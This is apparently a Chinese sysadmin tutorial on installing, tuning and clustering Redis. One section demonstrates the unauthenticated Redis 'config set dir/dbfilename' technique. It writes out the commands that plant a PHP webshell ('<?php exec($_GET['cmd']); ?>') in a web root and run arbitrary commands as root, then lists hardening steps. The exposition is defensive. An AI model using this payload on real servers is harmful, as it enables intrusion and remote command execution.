安装redis
-
安装前的准备
yum install vim wget make gcc gcc-c++ automake autoconf -y -
下载解压并安装
cd /root wget http://download.redis.io/releases/redis-4.0.8.tar.gz tar -zxzf redis-4.0.8.tar.gz cd redis-4.0.8 make PREFIX=/usr/local/redis/ install -
创建配置中要求的数据文件存储位置
mkdir /data mkdir /data/redis mkdir /usr/local/redis/log -
添加修改配置文件参考配置
cp ./redis.conf /usr/local/redis vim /usr/local/redis/redis.conf # IP绑定 bind 127.0.0.1 192.168.0.111 # 保护模式(开启条件为各redis之间可以互相通信,做集群不可开启) protected-mode yes # 访问端口 port 6379 # 连接超时,单位S,0为不启用超时 timeout 0 # 以守护进程运行 daemonize yes # 数据文件路径 dir /data/redis # 进程ID文件的路径 pidfile /usr/local/redis/log/redis.pid # 日志文件路径 logfile /usr/local/redis/log/redis.log # 开启键过期删除通知 notify-keyspace-events Ex ESC :wq # 以下安全配置选项仅作参考 # 禁用部分危险命令 rename-command FLUSHALL "" rename-command CONFIG "" rename-command EVAL "" # 添加访问密码 requirepass ******** # IP绑定本机 bind 127.0.0.1 -
性能优化
# 编辑/etc/rc.local vim /etc/rc.local echo never > /sys/kernel/mm/transparent_hugepage/enabled ESC :wq # 添加/etc/rc.local执行权限 chmod +x /etc/rc.d/rc.local # 编辑/etc/sysctl.conf vim /etc/sysctl.conf vm.overcommit_memory = 1 net.core.somaxconn = 1024 ESC :wq # 立即解决 echo never > /sys/kernel/mm/transparent_hugepage/enabled echo 1024 > /proc/sys/net/core/somaxconn sysctl vm.overcommit_memory=1 sysctl -p -
修改目录归属
useradd -s /sbin/nologin -M redis chown -R redis:redis /data/redis chown -R redis:redis /usr/local/redis -
启动redis并设置开机启动
# 进入单元文件目录 cd /etc/systemd/system # 创建redis单元文件,格式为: [单元文件名].[单元文件类型] vim redis.service [Unit] Description=Start redis on boot. After=default.target network.target [Service] User=redis Group=redis Type=forking PIDFile=/usr/local/redis/log/redis.pid ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf ExecReload=/bin/kill -s HUP $MAINPID ExecStop=/bin/kill -s QUIT $MAINPID PrivateTmp=false Restart=always [Install] WantedBy=multi-user.target ESC :wq # 修改文件权限为只有root用户可以编辑该文件 chown -R root:root /etc/systemd/system/redis.service chmod -R 644 /etc/systemd/system/redis.service # 更新systemd systemctl daemon-reload systemctl enable redis systemctl start redis -
存入数据
/usr/local/redis/bin/redis-cli -h 127.0.0.1 set num 123 save get num quit -
批量删除匹配规则数据
redis-cli keys [匹配规则]|xargs redis-cli del
Redis宕机 aof文件损坏 启动失败
- 拷贝aof文件
-
修复坏损的aof文件
redis-check-aof --fix [aof文件名] - 重新启动Redis
Redis漏洞webshell的利用
-
Redis该漏洞用到的原理如下
- redis原生支持通过'redis-cli>config set'在不重启redis服务的情况
下,动态修改配置dir、dbfilename; - redis的配置中如果指定'dir /www/'和'dbfilename test.php',则当执
行save命令时,会在/www/目录下生成一个数据存储文件test.php,虽然该文
件是一个二进制文件,但其内容中包含保存的数据的值,如果/www/目录为web
目录,则/www/test.php则会被人利用,成为入侵你服务器的入口; - redis原生支持通过'redis-cli>config set'在不重启redis服务的情况
-
漏洞举例(这是一个负面教材)
- redis以超级管理员用户root运行
- Nginx以超级管理员用户root启动,子进程也以root运行
-
web服务器为nginx,并做如下配置:
server { listen x; server_name xxx.xxx.com; root /www; location / { index index.php index.html index.htm; } location ~ .php$ { fastcgi_index index.php; fastcgi_pass 127.0.0.1:9000; fastcgi_param SCRIPT_NAME $fastcgi_script_name; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } -
通过redis-cli执行了以下命令
config set dir /www/ config set dbfilename test.php set test "<?php exec($_GET['cmd']); ?>" save -
这时候可怕的事情出现了
- 在/www/目录下,存在test.php文件,它可以通过http://xxx.xxx.com/test.php访问到
- 如果现在访问http://xxx.xxx.com/test.php?cmd=xxx,那么xxx就会被以root用户执行(xxx为任意linux命令)
Redis漏洞webshell的防范
- 不要线上使用redis的web管理工具
- redis以低权限用户运行(如rediser等让人想不到的用户名)
- redis仅允许通过本机和内网访问(bind 127.0.0.1 192.168.0.12/24)
- redis禁用config命令(在配置文件中可以禁用rename-command CONFIG "")
- web服务子进程以低权限用户运行(因为webshell的运行用户为web服务的子进程)
redis集群(cluster方式)
-
集群前的配置(单机两服务测试6379,6380)
# 内网IP:192.168.0.100 -
修改redis.conf
vim /usr/local/redis/redis.conf # 启用cluster cluster-enabled yes # 调用cluster配置文件 cluster-config-file nodes-6379.conf # 集群超时 cluster-node-timeout 15000 # 关闭宕机全停 cluster-require-full-coverage no # 集群从属元素个数 cluster-slave-validity-factor 10 # 从机数最低迁移值(master至少有两台slave,才能做slave迁移) cluster-migration-barrier 1 ESC :wq -
配置文件添加
yum install ruby gem install redis cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf mkdir /usr/local/redis/data/6379 mkdir /usr/local/redis/data/6380 -
修改redis-6379.conf
vim /usr/local/redis/redis-6379.conf unixsocket /usr/local/redis/data/6379/redis.sock pidfile /usr/local/redis/log/redis_6379.pid logfile /usr/local/redis/log/redis_6379.log dir /usr/local/redis/data/6379/ bind 192.168.0.100 port 6379 ESC :wq -
修改redis-6380.conf
vim /usr/local/redis/redis-6380.conf unixsocket /usr/local/redis/data/6380/redis.sock pidfile /usr/local/redis/log/redis_6380.pid logfile "/usr/local/redis/log/redis_6380.log" dir /usr/local/redis/data/6380/ bind 192.168.0.100 port 6380 ESC :wq -
修改开机启动
vim /etc/rc.local /usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf /usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf ESC :wq -
创建cluster
cd /root/redis/src/ # 查看帮助 ./redis-trib.rb help # 添加绑定 ./redis-trib.rb create --replicas 1 192.168.0.100:6379 192.168.0.100:6380 -
集群测试
/usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 -c -
正常关闭(不要强制关闭)
/usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 shutdown